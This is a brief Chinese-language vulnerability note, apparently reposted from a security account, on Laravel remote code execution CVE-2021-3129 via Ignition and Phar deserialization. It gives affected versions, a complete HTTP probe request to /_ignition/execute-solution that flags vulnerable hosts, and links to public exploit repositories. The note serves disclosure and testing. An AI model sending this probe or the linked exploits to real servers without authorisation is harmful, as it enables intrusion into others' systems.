CVE-2021-3129:Laravel远程代码漏洞
2023-3-12 15:1:25 Author: Ots安全(查看原文) 阅读量:21 收藏

Laravel RCE CVE-2021-3129

当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

Laravel <= 8.4.2

  • 返回 500 证明存在漏洞

POST /_ignition/execute-solution HTTP/1.1Host: 192.168.24.153:8888Accept: application/jsonContent-Type: application/x-www-form-urlencodedContent-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null

参考:

https://tyskill.github.io/posts/cve_2021_3129/

https://github.com/SNCKER/CVE-2021-3129

https://github.com/zhzyker/CVE-2021-3129

项目地址:

https://github.com/keyuan15/CVE-2021-3129


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496741&idx=4&sn=e1c3396adb151e60525b963d179d3301&chksm=9badbd6eacda3478ce0bec8963f1e4385e94b6326767de7f77a71eb2b74e9a3834da97149887#rd
如有侵权请联系:admin#unsafe.sh